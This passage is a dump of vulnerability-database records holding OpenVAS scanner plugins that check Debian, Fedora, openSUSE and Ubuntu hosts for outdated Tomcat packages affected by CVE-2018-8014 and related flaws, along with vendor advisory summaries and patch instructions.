rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"tomcat8\", ver:\"8.0.14-1+deb8u15\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"tomcat8-admin\", ver:\"8.0.14-1+deb8u15\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"tomcat8-common\", ver:\"8.0.14-1+deb8u15\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"tomcat8-docs\", ver:\"8.0.14-1+deb8u15\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"tomcat8-examples\", ver:\"8.0.14-1+deb8u15\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"tomcat8-user\", ver:\"8.0.14-1+deb8u15\", rls:\"DEB8\"))) {\n report += res;\n}\n\nif(report != \"\") {\n security_message(data:report);\n} else if(__pkg_match) {\n exit(99);\n}\n\nexit(0);\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:33:10", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2018-08-30T00:00:00", "type": "openvas", "title": "Fedora Update for tomcat FEDORA-2018-b1832101b8", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-8014", "CVE-2018-8034", "CVE-2018-8037"], "modified": "2019-03-15T00:00:00", "id": "OPENVAS:1361412562310875012", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310875012", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_fedora_2018_b1832101b8_tomcat_fc28.nasl 14223 2019-03-15 13:49:35Z cfischer $\n#\n# Fedora Update for tomcat FEDORA-2018-b1832101b8\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2018 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.875012\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2018-08-30 07:27:35 +0200 (Thu, 30 Aug 2018)\");\n script_cve_id(\"CVE-2018-8014\", \"CVE-2018-8034\", \"CVE-2018-8037\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Fedora Update for tomcat FEDORA-2018-b1832101b8\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'tomcat'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present\non the target host.\");\n script_tag(name:\"affected\", value:\"tomcat on Fedora 28\");\n script_tag(name:\"solution\", value:\"Please install the updated packages.\");\n\n script_xref(name:\"FEDORA\", value:\"2018-b1832101b8\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/C4TFRHHMLL6LSYA5X6QP6CKDFELA5XRK\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC28\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC28\")\n{\n\n if ((res = isrpmvuln(pkg:\"tomcat\", rpm:\"tomcat~8.5.32~1.fc28\", rls:\"FC28\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-01-31T17:39:53", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2018-09-18T00:00:00", "type": "openvas", "title": "openSUSE: Security Advisory for tomcat (openSUSE-SU-2018:2740-1)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-8014", "CVE-2018-8034", "CVE-2018-1336", "CVE-2018-8037"], "modified": "2020-01-31T00:00:00", "id": "OPENVAS:1361412562310851897", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310851897", "sourceData": "# Copyright (C) 2018 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) of their respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.851897\");\n script_version(\"2020-01-31T08:23:39+0000\");\n script_tag(name:\"last_modification\", value:\"2020-01-31 08:23:39 +0000 (Fri, 31 Jan 2020)\");\n script_tag(name:\"creation_date\", value:\"2018-09-18 08:13:15 +0200 (Tue, 18 Sep 2018)\");\n script_cve_id(\"CVE-2018-1336\", \"CVE-2018-8014\", \"CVE-2018-8034\", \"CVE-2018-8037\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"openSUSE: Security Advisory for tomcat (openSUSE-SU-2018:2740-1)\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'tomcat'\n package(s) announced via the referenced advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"This update for tomcat to 8.0.53 fixes the following issues:\n\n Security issue fixed:\n\n - CVE-2018-1336: An improper handing of overflow in the UTF-8 decoder with\n supplementary characters could have lead to an infinite loop in the\n decoder causing a Denial of Service (bsc#1102400).\n\n - CVE-2018-8034: The host name verification when using TLS with the\n WebSocket client was missing. It is now enabled by default (bsc#1102379).\n\n - CVE-2018-8037: If an async request was completed by the application at\n the same time as the container triggered the async timeout, a race\n condition existed that could have resulted in a user seeing a response\n intended for a different user. An additional issue was present in the\n NIO and NIO2 connectors that did not correctly track the closure of the\n connection when an async request was completed by the application and\n timed out by the container at the same time. This could also have\n resulted in a user seeing a response intended for another user\n (bsc#1102410).\n\n - CVE-2018-8014: Fix insecure default CORS filter settings (bsc#1093697).\n\n Bug fixes:\n\n - bsc#1067720: Avoid overwriting of customer's configuration during update.\n\n - bsc#1095472: Add Obsoletes for tomcat6 packages.\n\n This update was imported from the SUSE:SLE-12-SP2:Update update project.\n\n Patch Instructions:\n\n To install this openSUSE Security Update use the SUSE recommended\n installation methods\n like YaST online_update or 'zypper patch'.\n\n Alternatively you can run the command listed for your product:\n\n - openSUSE Leap 42.3:\n\n zypper in -t patch openSUSE-2018-1019=1\");\n\n script_tag(name:\"affected\", value:\"tomcat on openSUSE Leap 42.3\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_xref(name:\"openSUSE-SU\", value:\"2018:2740-1\");\n script_xref(name:\"URL\", value:\"https://lists.opensuse.org/opensuse-security-announce/2018-09/msg00036.html\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_family(\"SuSE Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/suse\", \"ssh/login/rpms\", re:\"ssh/login/release=openSUSELeap42\\.3\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"openSUSELeap42.3\") {\n if(!isnull(res = isrpmvuln(pkg:\"tomcat\", rpm:\"tomcat~8.0.53~15.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"tomcat-admin-webapps\", rpm:\"tomcat-admin-webapps~8.0.53~15.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"tomcat-docs-webapp\", rpm:\"tomcat-docs-webapp~8.0.53~15.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"tomcat-el-3_0-api\", rpm:\"tomcat-el-3_0-api~8.0.53~15.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"tomcat-embed\", rpm:\"tomcat-embed~8.0.53~15.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"tomcat-javadoc\", rpm:\"tomcat-javadoc~8.0.53~15.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"tomcat-jsp-2_3-api\", rpm:\"tomcat-jsp-2_3-api~8.0.53~15.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"tomcat-jsvc\", rpm:\"tomcat-jsvc~8.0.53~15.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"tomcat-lib\", rpm:\"tomcat-lib~8.0.53~15.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"tomcat-servlet-3_1-api\", rpm:\"tomcat-servlet-3_1-api~8.0.53~15.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"tomcat-webapps\", rpm:\"tomcat-webapps~8.0.53~15.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if(__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-01-31T17:38:38", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2018-10-26T00:00:00", "type": "openvas", "title": "openSUSE: Security Advisory for tomcat (openSUSE-SU-2018:3054-1)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-8014", "CVE-2018-8034", "CVE-2018-1336", "CVE-2018-8037"], "modified": "2020-01-31T00:00:00", "id": "OPENVAS:1361412562310852045", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310852045", "sourceData": "# Copyright (C) 2018 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) of their respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.852045\");\n script_version(\"2020-01-31T08:23:39+0000\");\n script_cve_id(\"CVE-2018-1336\", \"CVE-2018-8014\", \"CVE-2018-8034\", \"CVE-2018-8037\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"2020-01-31 08:23:39 +0000 (Fri, 31 Jan 2020)\");\n script_tag(name:\"creation_date\", value:\"2018-10-26 06:37:34 +0200 (Fri, 26 Oct 2018)\");\n script_name(\"openSUSE: Security Advisory for tomcat (openSUSE-SU-2018:3054-1)\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_family(\"SuSE Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/suse\", \"ssh/login/rpms\", re:\"ssh/login/release=openSUSELeap15\\.0\");\n\n script_xref(name:\"openSUSE-SU\", value:\"2018:3054-1\");\n script_xref(name:\"URL\", value:\"https://lists.opensuse.org/opensuse-security-announce/2018-10/msg00016.html\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'tomcat'\n package(s) announced via the openSUSE-SU-2018:3054-1 advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"This update for tomcat to version 9.0.10 fixes the following issues:\n\n Security issues fixed:\n\n - CVE-2018-1336: An improper handing of overflow in the UTF-8 decoder with\n supplementary characters could have lead to an infinite loop in the\n decoder causing a Denial of Service (bsc#1102400).\n\n - CVE-2018-8014: Fix insecure default CORS filter settings (bsc#1093697).\n\n - CVE-2018-8034: The host name verification when using TLS with the\n WebSocket client was missing. It is now enabled by default (bsc#1102379).\n\n - CVE-2018-8037: If an async request was completed by the application at\n the same time as the container triggered the async timeout, a race\n condition existed that could have resulted in a user seeing a response\n intended for a different user. An additional issue was present in the\n NIO and NIO2 connectors that did not correctly track the closure of the\n connection when an async request was completed by the application and\n timed out by the container at the same time. This could also have\n resulted in a user seeing a response intended for another user\n (bsc#1102410).\n\n Bug fixes:\n\n - Avoid overwriting of customer's configuration during update (bsc#1067720)\n\n - Disable adding OSGi metadata to JAR files\n\n This update was imported from the SUSE:SLE-15:Update update project.\n Patch Instructions:\n\n To install this openSUSE Security Update use the SUSE recommended\n installation methods\n like YaST online_update or 'zypper patch'.\n\n Alternatively you can run the command listed for your product:\n\n - openSUSE Leap 15.0:\n\n zypper in -t patch openSUSE-2018-1129=1\");\n\n script_tag(name:\"affected\", value:\"tomcat on openSUSE Leap 15.0.\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"openSUSELeap15.0\") {\n if(!isnull(res = isrpmvuln(pkg:\"tomcat\", rpm:\"tomcat~9.0.10~lp150.2.3.2\", rls:\"openSUSELeap15.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"tomcat-admin-webapps\", rpm:\"tomcat-admin-webapps~9.0.10~lp150.2.3.2\", rls:\"openSUSELeap15.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"tomcat-docs-webapp\", rpm:\"tomcat-docs-webapp~9.0.10~lp150.2.3.2\", rls:\"openSUSELeap15.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"tomcat-el-3_0-api\", rpm:\"tomcat-el-3_0-api~9.0.10~lp150.2.3.2\", rls:\"openSUSELeap15.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"tomcat-embed\", rpm:\"tomcat-embed~9.0.10~lp150.2.3.2\", rls:\"openSUSELeap15.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"tomcat-javadoc\", rpm:\"tomcat-javadoc~9.0.10~lp150.2.3.2\", rls:\"openSUSELeap15.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"tomcat-jsp-2_3-api\", rpm:\"tomcat-jsp-2_3-api~9.0.10~lp150.2.3.2\", rls:\"openSUSELeap15.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"tomcat-jsvc\", rpm:\"tomcat-jsvc~9.0.10~lp150.2.3.2\", rls:\"openSUSELeap15.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"tomcat-lib\", rpm:\"tomcat-lib~9.0.10~lp150.2.3.2\", rls:\"openSUSELeap15.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"tomcat-servlet-4_0-api\", rpm:\"tomcat-servlet-4_0-api~9.0.10~lp150.2.3.2\", rls:\"openSUSELeap15.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"tomcat-webapps\", rpm:\"tomcat-webapps~9.0.10~lp150.2.3.2\", rls:\"openSUSELeap15.0\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if(__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:32:12", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2019-04-03T00:00:00", "type": "openvas", "title": "Fedora Update for tomcat FEDORA-2018-b18f9dd65b", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-8014", "CVE-2018-8034", "CVE-2018-1336", "CVE-2018-11784", "CVE-2018-8037"], "modified": "2019-04-03T00:00:00", "id": "OPENVAS:1361412562310875539", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310875539", "sourceData": "# Copyright (C) 2019 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.875539\");\n script_version(\"2019-04-03T06:52:13+0000\");\n script_cve_id(\"CVE-2018-11784\", \"CVE-2018-8037\", \"CVE-2018-8034\", \"CVE-2018-8014\", \"CVE-2018-1336\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"2019-04-03 06:52:13 +0000 (Wed, 03 Apr 2019)\");\n script_tag(name:\"creation_date\", value:\"2019-04-03 06:52:13 +0000 (Wed, 03 Apr 2019)\");\n script_name(\"Fedora Update for tomcat FEDORA-2018-b18f9dd65b\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2019 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC28\");\n\n script_xref(name:\"FEDORA\", value:\"2018-b18f9dd65b\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/BZ4PX4B3QTKRM35VJAVIEOPZAF76RPBP\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'tomcat'\n package(s) announced via the FEDORA-2018-b18f9dd65b advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Tomcat is the servlet container that is used in the official Reference\nImplementation for the Java Servlet and JavaServer Pages technologies.\nThe Java Servlet and JavaServer Pages specifications are developed by\nSun under the Java Community Process.\n\nTomcat is developed in an open and participatory environment and\nreleased under the Apache Software License version 2.0. Tomcat is intended\nto be a collaboration of the best-of-breed developers from around the world.\");\n\n script_tag(name:\"affected\", value:\"'tomcat' package(s) on Fedora 28.\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"FC28\") {\n\n if(!isnull(res = isrpmvuln(pkg:\"tomcat\", rpm:\"tomcat~8.5.35~1.fc28\", rls:\"FC28\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if (__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-01-08T12:58:50", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2019-12-29T00:00:00", "type": "openvas", "title": "Debian Security Advisory DSA 4596-1 (tomcat8 - security update)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2019-12418", "CVE-2018-8014", "CVE-2019-0199", "CVE-2019-17563", "CVE-2018-11784", "CVE-2019-0221"], "modified": "2019-12-29T00:00:00", "id": "OPENVAS:1361412562310704596", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310704596", "sourceData": "# Copyright (C) 2019 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.704596\");\n script_version(\"2019-12-29T03:00:16+0000\");\n script_cve_id(\"CVE-2018-11784\", \"CVE-2018-8014\", \"CVE-2019-0199\", \"CVE-2019-0221\", \"CVE-2019-12418\", \"CVE-2019-17563\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"2019-12-29 03:00:16 +0000 (Sun, 29 Dec 2019)\");\n script_tag(name:\"creation_date\", value:\"2019-12-29 03:00:16 +0000 (Sun, 29 Dec 2019)\");\n script_name(\"Debian Security Advisory DSA 4596-1 (tomcat8 - security update)\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2019 Greenbone Networks GmbH\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\", re:\"ssh/login/release=DEB9\");\n\n script_xref(name:\"URL\", value:\"https://www.debian.org/security/2019/dsa-4596.html\");\n script_xref(name:\"URL\", value:\"https://security-tracker.debian.org/tracker/DSA-4596-1\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'tomcat8'\n package(s) announced via the DSA-4596-1 advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Several issues were discovered in the Tomcat servlet and JSP engine, which\ncould result in session fixation attacks, information disclosure, cross-site\nscripting, denial of service via resource exhaustion and insecure\nredirects.\");\n\n script_tag(name:\"affected\", value:\"'tomcat8' package(s) on Debian Linux.\");\n\n script_tag(name:\"solution\", value:\"For the oldstable distribution (stretch), these problems have been fixed\nin version 8.5.50-0+deb9u1. This update also requires an updated version\nof tomcat-native which has been updated to 1.2.21-1~deb9u1.\n\nWe recommend that you upgrade your tomcat8 packages.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif(!isnull(res = isdpkgvuln(pkg:\"libservlet3.1-java\", ver:\"8.5.50-0+deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"libservlet3.1-java-doc\", ver:\"8.5.50-0+deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"libtomcat8-embed-java\", ver:\"8.5.50-0+deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"libtomcat8-java\", ver:\"8.5.50-0+deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"tomcat8\", ver:\"8.5.50-0+deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"tomcat8-admin\", ver:\"8.5.50-0+deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"tomcat8-common\", ver:\"8.5.50-0+deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"tomcat8-docs\", ver:\"8.5.50-0+deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"tomcat8-examples\", ver:\"8.5.50-0+deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"tomcat8-user\", ver:\"8.5.50-0+deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\n\nif(report != \"\") {\n security_message(data:report);\n} else if(__pkg_match) {\n exit(99);\n}\n\nexit(0);", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:33:23", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2018-06-05T00:00:00", "type": "openvas", "title": "Ubuntu Update for tomcat8 USN-3665-1", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-15706", "CVE-2018-1304", "CVE-2018-8014", "CVE-2018-1305", "CVE-2017-12617", "CVE-2017-12616"], "modified": "2019-03-18T00:00:00", "id": "OPENVAS:1361412562310843539", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310843539", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_ubuntu_USN_3665_1.nasl 14288 2019-03-18 16:34:17Z cfischer $\n#\n# Ubuntu Update for tomcat8 USN-3665-1\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2018 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.843539\");\n script_version(\"$Revision: 14288 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-18 17:34:17 +0100 (Mon, 18 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2018-06-05 14:03:23 +0530 (Tue, 05 Jun 2018)\");\n script_cve_id(\"CVE-2017-12616\", \"CVE-2017-12617\", \"CVE-2017-15706\", \"CVE-2018-1304\",\n \"CVE-2018-1305\", \"CVE-2018-8014\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n 